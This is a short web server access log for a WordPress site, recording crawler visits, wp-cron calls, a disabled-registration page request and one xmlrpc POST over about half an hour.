204.76.203.219 - - [01/Jan/2026:21:32:59 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [01/Jan/2026:21:35:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767274504.8457829952239990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.191.171.6 - - [01/Jan/2026:21:35:04 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.204 - - [01/Jan/2026:21:35:05 +0800] "GET /services/ HTTP/1.1" 200 31630 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.90.208.132 - - [01/Jan/2026:21:45:07 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.0" 200 78605 "http://cqqizhou.com/portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:21:45:10 +0800] "POST /wp-cron.php?doing_wp_cron=1767275110.7963140010833740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
85.90.208.132 - - [01/Jan/2026:21:45:10 +0800] "GET /wp-login.php?action=register HTTP/1.0" 302 0 "http://cqqizhou.com/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.90.208.132 - - [01/Jan/2026:21:45:12 +0800] "GET /wp-login.php?registration=disabled HTTP/1.0" 200 8840 "http://cqqizhou.com/wp-login.php?registration=disabled" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
36.133.115.36 - - [01/Jan/2026:21:47:21 +0800] "POST /wp-cron.php?doing_wp_cron=1767275241.2999789714813232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
82.165.19.236 - - [01/Jan/2026:21:47:21 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"
36.133.115.36 - - [01/Jan/2026:21:48:29 +0800] "POST /wp-cron.php?doing_wp_cron=1767275309.1178510189056396484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
206.191.154.44 - - [01/Jan/2026:21:48:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [01/Jan/2026:22:03:47 +0800] "POST /wp-cron.php?doing_wp_cron=1767276227.3547699451446533203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
113.93.70.180 - - [01/Jan/2026:22:03:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.4020.66 Safari/537.36"
183.197.192.64 - - [01/Jan/2026:22:03:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.4571.84 Safari/537.36"
112.52.52.191 - - [01/Jan/2026:22:03:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.4310.63 Safari/537.36"
